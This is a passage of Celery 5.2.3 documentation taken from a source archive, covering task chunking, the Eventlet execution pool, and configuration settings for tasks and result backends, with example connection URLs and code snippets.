Some may worry that chunking your tasks results in a degradation of parallelism, but this is rarely true for a busy cluster and in practice since you're avoiding the overhead of messaging it may considerably increase performance. To create a chunks signature you can use :meth:`@Task.chunks`: .. code-block:: pycon >>> add.chunks(zip(range(100), range(100)), 10) As with :class:`~celery.group` the act of sending the messages for the chunks will happen in the current process when called: .. code-block:: pycon >>> from proj.tasks import add >>> res = add.chunks(zip(range(100), range(100)), 10)() >>> res.get() [[0, 2, 4, 6, 8, 10, 12, 14, 16, 18], [20, 22, 24, 26, 28, 30, 32, 34, 36, 38], [40, 42, 44, 46, 48, 50, 52, 54, 56, 58], [60, 62, 64, 66, 68, 70, 72, 74, 76, 78], [80, 82, 84, 86, 88, 90, 92, 94, 96, 98], [100, 102, 104, 106, 108, 110, 112, 114, 116, 118], [120, 122, 124, 126, 128, 130, 132, 134, 136, 138], [140, 142, 144, 146, 148, 150, 152, 154, 156, 158], [160, 162, 164, 166, 168, 170, 172, 174, 176, 178], [180, 182, 184, 186, 188, 190, 192, 194, 196, 198]] while calling ``.apply_async`` will create a dedicated task so that the individual tasks are applied in a worker instead: .. code-block:: pycon >>> add.chunks(zip(range(100), range(100)), 10).apply_async() You can also convert chunks to a group: .. code-block:: pycon >>> group = add.chunks(zip(range(100), range(100)), 10).group() and with the group skew the countdown of each task by increments of one: .. code-block:: pycon >>> group.skew(start=1, stop=10)() This means that the first task will have a countdown of one second, the second task a countdown of two seconds, and so on. ././@PaxHeader0000000000000000000000000000003300000000000011451 xustar000000000000000027 mtime=1640757094.703755 celery-5.2.3/docs/userguide/concurrency/0000775000175000017500000000000000000000000020153 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/userguide/concurrency/eventlet.rst0000664000175000017500000000515300000000000022537 0ustar00asifasif00000000000000.. _concurrency-eventlet: =========================== Concurrency with Eventlet =========================== .. _eventlet-introduction: Introduction ============ The `Eventlet`_ homepage describes it as a concurrent networking library for Python that allows you to change how you run your code, not how you write it. * It uses `epoll(4)`_ or `libevent`_ for `highly scalable non-blocking I/O`_. * `Coroutines`_ ensure that the developer uses a blocking style of programming that's similar to threading, but provide the benefits of non-blocking I/O. * The event dispatch is implicit: meaning you can easily use Eventlet from the Python interpreter, or as a small part of a larger application. Celery supports Eventlet as an alternative execution pool implementation and in some cases superior to prefork. However, you need to ensure one task doesn't block the event loop too long. Generally, CPU-bound operations don't go well with Eventlet. Also note that some libraries, usually with C extensions, cannot be monkeypatched and therefore cannot benefit from using Eventlet. Please refer to their documentation if you are not sure. For example, pylibmc does not allow cooperation with Eventlet but psycopg2 does when both of them are libraries with C extensions. The prefork pool can take use of multiple processes, but how many is often limited to a few processes per CPU. 
With Eventlet you can efficiently spawn hundreds, or thousands of green threads. In an informal test with a feed hub system the Eventlet pool could fetch and process hundreds of feeds every second, while the prefork pool spent 14 seconds processing 100 feeds. Note that this is one of the applications async I/O is especially good at (asynchronous HTTP requests). You may want a mix of both Eventlet and prefork workers, and route tasks according to compatibility or what works best. Enabling Eventlet ================= You can enable the Eventlet pool by using the :option:`celery worker -P` worker option. .. code-block:: console $ celery -A proj worker -P eventlet -c 1000 .. _eventlet-examples: Examples ======== See the `Eventlet examples`_ directory in the Celery distribution for some examples taking use of Eventlet support. .. _`Eventlet`: http://eventlet.net .. _`epoll(4)`: http://linux.die.net/man/4/epoll .. _`libevent`: http://monkey.org/~provos/libevent/ .. _`highly scalable non-blocking I/O`: https://en.wikipedia.org/wiki/Asynchronous_I/O#Select.28.2Fpoll.29_loops .. _`Coroutines`: https://en.wikipedia.org/wiki/Coroutine .. _`Eventlet examples`: https://github.com/celery/celery/tree/master/examples/eventlet ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/userguide/concurrency/index.rst0000664000175000017500000000021400000000000022011 0ustar00asifasif00000000000000.. _concurrency: ============= Concurrency ============= :Release: |version| :Date: |today| .. toctree:: :maxdepth: 2 eventlet ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/docs/userguide/configuration.rst0000664000175000017500000026034000000000000021227 0ustar00asifasif00000000000000.. _configuration: ============================ Configuration and defaults ============================ This document describes the configuration options available. If you're using the default loader, you must create the :file:`celeryconfig.py` module and make sure it's available on the Python path. .. contents:: :local: :depth: 2 .. _conf-example: Example configuration file ========================== This is an example configuration file to get you started. It should contain all you need to run a basic Celery set-up. .. code-block:: python ## Broker settings. broker_url = 'amqp://guest:guest@localhost:5672//' # List of modules to import when the Celery worker starts. imports = ('myapp.tasks',) ## Using the database to store task state and results. result_backend = 'db+sqlite:///results.db' task_annotations = {'tasks.add': {'rate_limit': '10/s'}} .. _conf-old-settings-map: New lowercase settings ====================== Version 4.0 introduced new lower case settings and setting organization. The major difference between previous versions, apart from the lower case names, are the renaming of some prefixes, like ``celery_beat_`` to ``beat_``, ``celeryd_`` to ``worker_``, and most of the top level ``celery_`` settings have been moved into a new ``task_`` prefix. .. warning:: Celery will still be able to read old configuration files until Celery 6.0. Afterwards, support for the old configuration files will be removed. We provide the ``celery upgrade`` command that should handle plenty of cases (including :ref:`Django `). Please migrate to the new configuration scheme as soon as possible. 
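As a rough sketch of what such a migration looks like in code (assuming a
Celery app instance named ``app``), old uppercase names from the table
below map onto the new lowercase settings like this:

.. code-block:: python

    # Before (pre-4.0 style, still readable until Celery 6.0):
    #   BROKER_URL = 'amqp://guest:guest@localhost:5672//'
    #   CELERY_ACCEPT_CONTENT = ['json']
    #   CELERYD_CONCURRENCY = 8

    # After (new lowercase settings):
    app.conf.update(
        broker_url='amqp://guest:guest@localhost:5672//',
        accept_content=['json'],
        worker_concurrency=8,
    )
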
========================================== ============================================== **Setting name** **Replace with** ========================================== ============================================== ``CELERY_ACCEPT_CONTENT`` :setting:`accept_content` ``CELERY_ENABLE_UTC`` :setting:`enable_utc` ``CELERY_IMPORTS`` :setting:`imports` ``CELERY_INCLUDE`` :setting:`include` ``CELERY_TIMEZONE`` :setting:`timezone` ``CELERYBEAT_MAX_LOOP_INTERVAL`` :setting:`beat_max_loop_interval` ``CELERYBEAT_SCHEDULE`` :setting:`beat_schedule` ``CELERYBEAT_SCHEDULER`` :setting:`beat_scheduler` ``CELERYBEAT_SCHEDULE_FILENAME`` :setting:`beat_schedule_filename` ``CELERYBEAT_SYNC_EVERY`` :setting:`beat_sync_every` ``BROKER_URL`` :setting:`broker_url` ``BROKER_TRANSPORT`` :setting:`broker_transport` ``BROKER_TRANSPORT_OPTIONS`` :setting:`broker_transport_options` ``BROKER_CONNECTION_TIMEOUT`` :setting:`broker_connection_timeout` ``BROKER_CONNECTION_RETRY`` :setting:`broker_connection_retry` ``BROKER_CONNECTION_MAX_RETRIES`` :setting:`broker_connection_max_retries` ``BROKER_FAILOVER_STRATEGY`` :setting:`broker_failover_strategy` ``BROKER_HEARTBEAT`` :setting:`broker_heartbeat` ``BROKER_LOGIN_METHOD`` :setting:`broker_login_method` ``BROKER_POOL_LIMIT`` :setting:`broker_pool_limit` ``BROKER_USE_SSL`` :setting:`broker_use_ssl` ``CELERY_CACHE_BACKEND`` :setting:`cache_backend` ``CELERY_CACHE_BACKEND_OPTIONS`` :setting:`cache_backend_options` ``CASSANDRA_COLUMN_FAMILY`` :setting:`cassandra_table` ``CASSANDRA_ENTRY_TTL`` :setting:`cassandra_entry_ttl` ``CASSANDRA_KEYSPACE`` :setting:`cassandra_keyspace` ``CASSANDRA_PORT`` :setting:`cassandra_port` ``CASSANDRA_READ_CONSISTENCY`` :setting:`cassandra_read_consistency` ``CASSANDRA_SERVERS`` :setting:`cassandra_servers` ``CASSANDRA_WRITE_CONSISTENCY`` :setting:`cassandra_write_consistency` ``CASSANDRA_OPTIONS`` :setting:`cassandra_options` ``S3_ACCESS_KEY_ID`` :setting:`s3_access_key_id` ``S3_SECRET_ACCESS_KEY`` :setting:`s3_secret_access_key` ``S3_BUCKET`` :setting:`s3_bucket` ``S3_BASE_PATH`` :setting:`s3_base_path` ``S3_ENDPOINT_URL`` :setting:`s3_endpoint_url` ``S3_REGION`` :setting:`s3_region` ``CELERY_COUCHBASE_BACKEND_SETTINGS`` :setting:`couchbase_backend_settings` ``CELERY_ARANGODB_BACKEND_SETTINGS`` :setting:`arangodb_backend_settings` ``CELERY_MONGODB_BACKEND_SETTINGS`` :setting:`mongodb_backend_settings` ``CELERY_EVENT_QUEUE_EXPIRES`` :setting:`event_queue_expires` ``CELERY_EVENT_QUEUE_TTL`` :setting:`event_queue_ttl` ``CELERY_EVENT_QUEUE_PREFIX`` :setting:`event_queue_prefix` ``CELERY_EVENT_SERIALIZER`` :setting:`event_serializer` ``CELERY_REDIS_DB`` :setting:`redis_db` ``CELERY_REDIS_HOST`` :setting:`redis_host` ``CELERY_REDIS_MAX_CONNECTIONS`` :setting:`redis_max_connections` ``CELERY_REDIS_USERNAME`` :setting:`redis_username` ``CELERY_REDIS_PASSWORD`` :setting:`redis_password` ``CELERY_REDIS_PORT`` :setting:`redis_port` ``CELERY_REDIS_BACKEND_USE_SSL`` :setting:`redis_backend_use_ssl` ``CELERY_RESULT_BACKEND`` :setting:`result_backend` ``CELERY_MAX_CACHED_RESULTS`` :setting:`result_cache_max` ``CELERY_MESSAGE_COMPRESSION`` :setting:`result_compression` ``CELERY_RESULT_EXCHANGE`` :setting:`result_exchange` ``CELERY_RESULT_EXCHANGE_TYPE`` :setting:`result_exchange_type` ``CELERY_RESULT_EXPIRES`` :setting:`result_expires` ``CELERY_RESULT_PERSISTENT`` :setting:`result_persistent` ``CELERY_RESULT_SERIALIZER`` :setting:`result_serializer` ``CELERY_RESULT_DBURI`` Use :setting:`result_backend` instead. 
``CELERY_RESULT_ENGINE_OPTIONS`` :setting:`database_engine_options` ``[...]_DB_SHORT_LIVED_SESSIONS`` :setting:`database_short_lived_sessions` ``CELERY_RESULT_DB_TABLE_NAMES`` :setting:`database_db_names` ``CELERY_SECURITY_CERTIFICATE`` :setting:`security_certificate` ``CELERY_SECURITY_CERT_STORE`` :setting:`security_cert_store` ``CELERY_SECURITY_KEY`` :setting:`security_key` ``CELERY_ACKS_LATE`` :setting:`task_acks_late` ``CELERY_ACKS_ON_FAILURE_OR_TIMEOUT`` :setting:`task_acks_on_failure_or_timeout` ``CELERY_ALWAYS_EAGER`` :setting:`task_always_eager` ``CELERY_ANNOTATIONS`` :setting:`task_annotations` ``CELERY_COMPRESSION`` :setting:`task_compression` ``CELERY_CREATE_MISSING_QUEUES`` :setting:`task_create_missing_queues` ``CELERY_DEFAULT_DELIVERY_MODE`` :setting:`task_default_delivery_mode` ``CELERY_DEFAULT_EXCHANGE`` :setting:`task_default_exchange` ``CELERY_DEFAULT_EXCHANGE_TYPE`` :setting:`task_default_exchange_type` ``CELERY_DEFAULT_QUEUE`` :setting:`task_default_queue` ``CELERY_DEFAULT_RATE_LIMIT`` :setting:`task_default_rate_limit` ``CELERY_DEFAULT_ROUTING_KEY`` :setting:`task_default_routing_key` ``CELERY_EAGER_PROPAGATES`` :setting:`task_eager_propagates` ``CELERY_IGNORE_RESULT`` :setting:`task_ignore_result` ``CELERY_PUBLISH_RETRY`` :setting:`task_publish_retry` ``CELERY_PUBLISH_RETRY_POLICY`` :setting:`task_publish_retry_policy` ``CELERY_QUEUES`` :setting:`task_queues` ``CELERY_ROUTES`` :setting:`task_routes` ``CELERY_SEND_SENT_EVENT`` :setting:`task_send_sent_event` ``CELERY_SERIALIZER`` :setting:`task_serializer` ``CELERYD_SOFT_TIME_LIMIT`` :setting:`task_soft_time_limit` ``CELERY_TASK_TRACK_STARTED`` :setting:`task_track_started` ``CELERY_TASK_REJECT_ON_WORKER_LOST`` :setting:`task_reject_on_worker_lost` ``CELERYD_TIME_LIMIT`` :setting:`task_time_limit` ``CELERYD_AGENT`` :setting:`worker_agent` ``CELERYD_AUTOSCALER`` :setting:`worker_autoscaler` ``CELERYD_CONCURRENCY`` :setting:`worker_concurrency` ``CELERYD_CONSUMER`` :setting:`worker_consumer` ``CELERY_WORKER_DIRECT`` :setting:`worker_direct` ``CELERY_DISABLE_RATE_LIMITS`` :setting:`worker_disable_rate_limits` ``CELERY_ENABLE_REMOTE_CONTROL`` :setting:`worker_enable_remote_control` ``CELERYD_HIJACK_ROOT_LOGGER`` :setting:`worker_hijack_root_logger` ``CELERYD_LOG_COLOR`` :setting:`worker_log_color` ``CELERYD_LOG_FORMAT`` :setting:`worker_log_format` ``CELERYD_WORKER_LOST_WAIT`` :setting:`worker_lost_wait` ``CELERYD_MAX_TASKS_PER_CHILD`` :setting:`worker_max_tasks_per_child` ``CELERYD_POOL`` :setting:`worker_pool` ``CELERYD_POOL_PUTLOCKS`` :setting:`worker_pool_putlocks` ``CELERYD_POOL_RESTARTS`` :setting:`worker_pool_restarts` ``CELERYD_PREFETCH_MULTIPLIER`` :setting:`worker_prefetch_multiplier` ``CELERYD_REDIRECT_STDOUTS`` :setting:`worker_redirect_stdouts` ``CELERYD_REDIRECT_STDOUTS_LEVEL`` :setting:`worker_redirect_stdouts_level` ``CELERY_SEND_EVENTS`` :setting:`worker_send_task_events` ``CELERYD_STATE_DB`` :setting:`worker_state_db` ``CELERYD_TASK_LOG_FORMAT`` :setting:`worker_task_log_format` ``CELERYD_TIMER`` :setting:`worker_timer` ``CELERYD_TIMER_PRECISION`` :setting:`worker_timer_precision` ========================================== ============================================== Configuration Directives ======================== .. _conf-datetime: General settings ---------------- .. setting:: accept_content ``accept_content`` ~~~~~~~~~~~~~~~~~~ Default: ``{'json'}`` (set, list, or tuple). A white-list of content-types/serializers to allow. 
If a message is received that's not in this list then the message will be discarded with an error. By default only json is enabled but any content type can be added, including pickle and yaml; when this is the case make sure untrusted parties don't have access to your broker. See :ref:`guide-security` for more. Example:: # using serializer name accept_content = ['json'] # or the actual content-type (MIME) accept_content = ['application/json'] .. setting:: result_accept_content ``result_accept_content`` ~~~~~~~~~~~~~~~~~~~~~~~~~ Default: ``None`` (can be set, list or tuple). .. versionadded:: 4.3 A white-list of content-types/serializers to allow for the result backend. If a message is received that's not in this list then the message will be discarded with an error. By default it is the same serializer as ``accept_content``. However, a different serializer for accepted content of the result backend can be specified. Usually this is needed if signed messaging is used and the result is stored unsigned in the result backend. See :ref:`guide-security` for more. Example:: # using serializer name result_accept_content = ['json'] # or the actual content-type (MIME) result_accept_content = ['application/json'] Time and date settings ---------------------- .. setting:: enable_utc ``enable_utc`` ~~~~~~~~~~~~~~ .. versionadded:: 2.5 Default: Enabled by default since version 3.0. If enabled dates and times in messages will be converted to use the UTC timezone. Note that workers running Celery versions below 2.5 will assume a local timezone for all messages, so only enable if all workers have been upgraded. .. setting:: timezone ``timezone`` ~~~~~~~~~~~~ .. versionadded:: 2.5 Default: ``"UTC"``. Configure Celery to use a custom time zone. The timezone value can be any time zone supported by the :pypi:`pytz` library. If not set the UTC timezone is used. For backwards compatibility there's also a :setting:`enable_utc` setting, and when this is set to false the system local timezone is used instead. .. _conf-tasks: Task settings ------------- .. setting:: task_annotations ``task_annotations`` ~~~~~~~~~~~~~~~~~~~~ .. versionadded:: 2.5 Default: :const:`None`. This setting can be used to rewrite any task attribute from the configuration. The setting can be a dict, or a list of annotation objects that filter for tasks and return a map of attributes to change. This will change the ``rate_limit`` attribute for the ``tasks.add`` task: .. code-block:: python task_annotations = {'tasks.add': {'rate_limit': '10/s'}} or change the same for all tasks: .. code-block:: python task_annotations = {'*': {'rate_limit': '10/s'}} You can change methods too, for example the ``on_failure`` handler: .. code-block:: python def my_on_failure(self, exc, task_id, args, kwargs, einfo): print('Oh no! Task failed: {0!r}'.format(exc)) task_annotations = {'*': {'on_failure': my_on_failure}} If you need more flexibility then you can use objects instead of a dict to choose the tasks to annotate: .. code-block:: python class MyAnnotate: def annotate(self, task): if task.name.startswith('tasks.'): return {'rate_limit': '10/s'} task_annotations = (MyAnnotate(), {other,}) .. setting:: task_compression ``task_compression`` ~~~~~~~~~~~~~~~~~~~~ Default: :const:`None` Default compression used for task messages. Can be ``gzip``, ``bzip2`` (if available), or any custom compression schemes registered in the Kombu compression registry. The default is to send uncompressed messages. .. setting:: task_protocol ``task_protocol`` ~~~~~~~~~~~~~~~~~ .. 
versionadded: 4.0 Default: 2 (since 4.0). Set the default task message protocol version used to send tasks. Supports protocols: 1 and 2. Protocol 2 is supported by 3.1.24 and 4.x+. .. setting:: task_serializer ``task_serializer`` ~~~~~~~~~~~~~~~~~~~ Default: ``"json"`` (since 4.0, earlier: pickle). A string identifying the default serialization method to use. Can be `json` (default), `pickle`, `yaml`, `msgpack`, or any custom serialization methods that have been registered with :mod:`kombu.serialization.registry`. .. seealso:: :ref:`calling-serializers`. .. setting:: task_publish_retry ``task_publish_retry`` ~~~~~~~~~~~~~~~~~~~~~~ .. versionadded:: 2.2 Default: Enabled. Decides if publishing task messages will be retried in the case of connection loss or other connection errors. See also :setting:`task_publish_retry_policy`. .. setting:: task_publish_retry_policy ``task_publish_retry_policy`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .. versionadded:: 2.2 Default: See :ref:`calling-retry`. Defines the default policy when retrying publishing a task message in the case of connection loss or other connection errors. .. _conf-task-execution: Task execution settings ----------------------- .. setting:: task_always_eager ``task_always_eager`` ~~~~~~~~~~~~~~~~~~~~~ Default: Disabled. If this is :const:`True`, all tasks will be executed locally by blocking until the task returns. ``apply_async()`` and ``Task.delay()`` will return an :class:`~celery.result.EagerResult` instance, that emulates the API and behavior of :class:`~celery.result.AsyncResult`, except the result is already evaluated. That is, tasks will be executed locally instead of being sent to the queue. .. setting:: task_eager_propagates ``task_eager_propagates`` ~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Disabled. If this is :const:`True`, eagerly executed tasks (applied by `task.apply()`, or when the :setting:`task_always_eager` setting is enabled), will propagate exceptions. It's the same as always running ``apply()`` with ``throw=True``. .. setting:: task_store_eager_result ``task_store_eager_result`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~ .. versionadded:: 5.1 Default: Disabled. If this is :const:`True` and :setting:`task_always_eager` is :const:`True` and :setting:`task_ignore_result` is :const:`False`, the results of eagerly executed tasks will be saved to the backend. By default, even with :setting:`task_always_eager` set to :const:`True` and :setting:`task_ignore_result` set to :const:`False`, the result will not be saved. .. setting:: task_remote_tracebacks ``task_remote_tracebacks`` ~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Disabled. If enabled task results will include the workers stack when re-raising task errors. This requires the :pypi:`tblib` library, that can be installed using :command:`pip`: .. code-block:: console $ pip install celery[tblib] See :ref:`bundles` for information on combining multiple extension requirements. .. setting:: task_ignore_result ``task_ignore_result`` ~~~~~~~~~~~~~~~~~~~~~~ Default: Disabled. Whether to store the task return values or not (tombstones). If you still want to store errors, just not successful return values, you can set :setting:`task_store_errors_even_if_ignored`. .. setting:: task_store_errors_even_if_ignored ``task_store_errors_even_if_ignored`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Disabled. If set, the worker stores all task errors in the result store even if :attr:`Task.ignore_result ` is on. .. setting:: task_track_started ``task_track_started`` ~~~~~~~~~~~~~~~~~~~~~~ Default: Disabled. 
If :const:`True` the task will report its status as 'started' when the task is executed by a worker. The default value is :const:`False` as the normal behavior is to not report that level of granularity. Tasks are either pending, finished, or waiting to be retried. Having a 'started' state can be useful for when there are long running tasks and there's a need to report what task is currently running. .. setting:: task_time_limit ``task_time_limit`` ~~~~~~~~~~~~~~~~~~~ Default: No time limit. Task hard time limit in seconds. The worker processing the task will be killed and replaced with a new one when this is exceeded. .. setting:: task_soft_time_limit ``task_soft_time_limit`` ~~~~~~~~~~~~~~~~~~~~~~~~ Default: No soft time limit. Task soft time limit in seconds. The :exc:`~@SoftTimeLimitExceeded` exception will be raised when this is exceeded. For example, the task can catch this to clean up before the hard time limit comes: .. code-block:: python from celery.exceptions import SoftTimeLimitExceeded @app.task def mytask(): try: return do_work() except SoftTimeLimitExceeded: cleanup_in_a_hurry() .. setting:: task_acks_late ``task_acks_late`` ~~~~~~~~~~~~~~~~~~ Default: Disabled. Late ack means the task messages will be acknowledged **after** the task has been executed, not *just before* (the default behavior). .. seealso:: FAQ: :ref:`faq-acks_late-vs-retry`. .. setting:: task_acks_on_failure_or_timeout ``task_acks_on_failure_or_timeout`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Enabled When enabled messages for all tasks will be acknowledged even if they fail or time out. Configuring this setting only applies to tasks that are acknowledged **after** they have been executed and only if :setting:`task_acks_late` is enabled. .. setting:: task_reject_on_worker_lost ``task_reject_on_worker_lost`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Disabled. Even if :setting:`task_acks_late` is enabled, the worker will acknowledge tasks when the worker process executing them abruptly exits or is signaled (e.g., :sig:`KILL`/:sig:`INT`, etc). Setting this to true allows the message to be re-queued instead, so that the task will execute again by the same worker, or another worker. .. warning:: Enabling this can cause message loops; make sure you know what you're doing. .. setting:: task_default_rate_limit ``task_default_rate_limit`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: No rate limit. The global default rate limit for tasks. This value is used for tasks that doesn't have a custom rate limit .. seealso:: The setting:`worker_disable_rate_limits` setting can disable all rate limits. .. _conf-result-backend: Task result backend settings ---------------------------- .. setting:: result_backend ``result_backend`` ~~~~~~~~~~~~~~~~~~ Default: No result backend enabled by default. The backend used to store task results (tombstones). Can be one of the following: * ``rpc`` Send results back as AMQP messages See :ref:`conf-rpc-result-backend`. * ``database`` Use a relational database supported by `SQLAlchemy`_. See :ref:`conf-database-result-backend`. * ``redis`` Use `Redis`_ to store the results. See :ref:`conf-redis-result-backend`. * ``cache`` Use `Memcached`_ to store the results. See :ref:`conf-cache-result-backend`. * mongodb Use `MongoDB`_ to store the results. See :ref:`conf-mongodb-result-backend`. * ``cassandra`` Use `Cassandra`_ to store the results. See :ref:`conf-cassandra-result-backend`. * ``elasticsearch`` Use `Elasticsearch`_ to store the results. See :ref:`conf-elasticsearch-result-backend`. 
* ``ironcache``
    Use `IronCache`_ to store the results.
    See :ref:`conf-ironcache-result-backend`.

* ``couchbase``
    Use `Couchbase`_ to store the results.
    See :ref:`conf-couchbase-result-backend`.

* ``arangodb``
    Use `ArangoDB`_ to store the results.
    See :ref:`conf-arangodb-result-backend`.

* ``couchdb``
    Use `CouchDB`_ to store the results.
    See :ref:`conf-couchdb-result-backend`.

* ``cosmosdbsql (experimental)``
    Use the `CosmosDB`_ PaaS to store the results.
    See :ref:`conf-cosmosdbsql-result-backend`.

* ``filesystem``
    Use a shared directory to store the results.
    See :ref:`conf-filesystem-result-backend`.

* ``consul``
    Use the `Consul`_ K/V store to store the results.
    See :ref:`conf-consul-result-backend`.

* ``azureblockblob``
    Use the `AzureBlockBlob`_ PaaS store to store the results.
    See :ref:`conf-azureblockblob-result-backend`.

* ``s3``
    Use `S3`_ to store the results.
    See :ref:`conf-s3-result-backend`.

.. warning::

    While the AMQP result backend is very efficient, you must make sure
    you only receive the same result once. See :doc:`userguide/calling`.

.. _`SQLAlchemy`: http://sqlalchemy.org
.. _`Memcached`: http://memcached.org
.. _`MongoDB`: http://mongodb.org
.. _`Redis`: https://redis.io
.. _`Cassandra`: http://cassandra.apache.org/
.. _`Elasticsearch`: https://aws.amazon.com/elasticsearch-service/
.. _`IronCache`: http://www.iron.io/cache
.. _`CouchDB`: http://www.couchdb.com/
.. _`CosmosDB`: https://azure.microsoft.com/en-us/services/cosmos-db/
.. _`Couchbase`: https://www.couchbase.com/
.. _`ArangoDB`: https://www.arangodb.com/
.. _`Consul`: https://consul.io/
.. _`AzureBlockBlob`: https://azure.microsoft.com/en-us/services/storage/blobs/
.. _`S3`: https://aws.amazon.com/s3/

.. setting:: result_backend_always_retry

``result_backend_always_retry``
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Default: :const:`False`

If enabled, the backend will try to retry in the event of recoverable
exceptions instead of propagating the exception. It will use an
exponential backoff sleep time between retries.

.. setting:: result_backend_max_sleep_between_retries_ms

``result_backend_max_sleep_between_retries_ms``
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Default: 10000

This specifies the maximum sleep time between two backend operation retries.

.. setting:: result_backend_base_sleep_between_retries_ms

``result_backend_base_sleep_between_retries_ms``
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Default: 10

This specifies the base amount of sleep time between two backend operation retries.

.. setting:: result_backend_max_retries

``result_backend_max_retries``
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Default: Inf

This is the maximum number of retries in case of recoverable exceptions.

.. setting:: result_backend_transport_options

``result_backend_transport_options``
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Default: ``{}`` (empty mapping).

A dict of additional options passed to the underlying transport.

See your transport user manual for supported options (if any).

Example setting the visibility timeout (supported by Redis and SQS
transports):

.. code-block:: python

    result_backend_transport_options = {'visibility_timeout': 18000}  # 5 hours

.. setting:: result_serializer

``result_serializer``
~~~~~~~~~~~~~~~~~~~~~

Default: ``json`` since 4.0 (earlier: pickle).

Result serialization format.

See :ref:`calling-serializers` for information about supported
serialization formats.

.. setting:: result_compression

``result_compression``
~~~~~~~~~~~~~~~~~~~~~~

Default: No compression.

Optional compression method used for task results.
Supports the same options as the :setting:`task_compression` setting. .. setting:: result_extended ``result_extended`` ~~~~~~~~~~~~~~~~~~~~~~ Default: ``False`` Enables extended task result attributes (name, args, kwargs, worker, retries, queue, delivery_info) to be written to backend. .. setting:: result_expires ``result_expires`` ~~~~~~~~~~~~~~~~~~ Default: Expire after 1 day. Time (in seconds, or a :class:`~datetime.timedelta` object) for when after stored task tombstones will be deleted. A built-in periodic task will delete the results after this time (``celery.backend_cleanup``), assuming that ``celery beat`` is enabled. The task runs daily at 4am. A value of :const:`None` or 0 means results will never expire (depending on backend specifications). .. note:: For the moment this only works with the AMQP, database, cache, Couchbase, and Redis backends. When using the database backend, ``celery beat`` must be running for the results to be expired. .. setting:: result_cache_max ``result_cache_max`` ~~~~~~~~~~~~~~~~~~~~ Default: Disabled by default. Enables client caching of results. This can be useful for the old deprecated 'amqp' backend where the result is unavailable as soon as one result instance consumes it. This is the total number of results to cache before older results are evicted. A value of 0 or None means no limit, and a value of :const:`-1` will disable the cache. Disabled by default. .. setting:: result_chord_join_timeout ``result_chord_join_timeout`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 3.0. The timeout in seconds (int/float) when joining a group's results within a chord. .. setting:: result_chord_retry_interval ``result_chord_retry_interval`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 1.0. Default interval for retrying chord tasks. .. _conf-database-result-backend: .. setting:: override_backends ``override_backends`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Disabled by default. Path to class that implements backend. Allows to override backend implementation. This can be useful if you need to store additional metadata about executed tasks, override retry policies, etc. Example: .. code-block:: python override_backends = {"db": "custom_module.backend.class"} Database backend settings ------------------------- Database URL Examples ~~~~~~~~~~~~~~~~~~~~~ To use the database backend you have to configure the :setting:`result_backend` setting with a connection URL and the ``db+`` prefix: .. code-block:: python result_backend = 'db+scheme://user:password@host:port/dbname' Examples:: # sqlite (filename) result_backend = 'db+sqlite:///results.sqlite' # mysql result_backend = 'db+mysql://scott:tiger@localhost/foo' # postgresql result_backend = 'db+postgresql://scott:tiger@localhost/mydatabase' # oracle result_backend = 'db+oracle://scott:tiger@127.0.0.1:1521/sidname' .. code-block:: python Please see `Supported Databases`_ for a table of supported databases, and `Connection String`_ for more information about connection strings (this is the part of the URI that comes after the ``db+`` prefix). .. _`Supported Databases`: http://www.sqlalchemy.org/docs/core/engines.html#supported-databases .. _`Connection String`: http://www.sqlalchemy.org/docs/core/engines.html#database-urls .. setting:: database_engine_options ``database_engine_options`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: ``{}`` (empty mapping). To specify additional SQLAlchemy database engine options you can use the :setting:`database_engine_options` setting:: # echo enables verbose logging from SQLAlchemy. 
app.conf.database_engine_options = {'echo': True} .. setting:: database_short_lived_sessions ``database_short_lived_sessions`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Disabled by default. Short lived sessions are disabled by default. If enabled they can drastically reduce performance, especially on systems processing lots of tasks. This option is useful on low-traffic workers that experience errors as a result of cached database connections going stale through inactivity. For example, intermittent errors like `(OperationalError) (2006, 'MySQL server has gone away')` can be fixed by enabling short lived sessions. This option only affects the database backend. .. setting:: database_table_schemas ``database_table_schemas`` ~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: ``{}`` (empty mapping). When SQLAlchemy is configured as the result backend, Celery automatically creates two tables to store result meta-data for tasks. This setting allows you to customize the schema of the tables: .. code-block:: python # use custom schema for the database result backend. database_table_schemas = { 'task': 'celery', 'group': 'celery', } .. setting:: database_table_names ``database_table_names`` ~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: ``{}`` (empty mapping). When SQLAlchemy is configured as the result backend, Celery automatically creates two tables to store result meta-data for tasks. This setting allows you to customize the table names: .. code-block:: python # use custom table names for the database result backend. database_table_names = { 'task': 'myapp_taskmeta', 'group': 'myapp_groupmeta', } .. _conf-rpc-result-backend: RPC backend settings -------------------- .. setting:: result_persistent ``result_persistent`` ~~~~~~~~~~~~~~~~~~~~~ Default: Disabled by default (transient messages). If set to :const:`True`, result messages will be persistent. This means the messages won't be lost after a broker restart. Example configuration ~~~~~~~~~~~~~~~~~~~~~ .. code-block:: python result_backend = 'rpc://' result_persistent = False **Please note**: using this backend could trigger the raise of 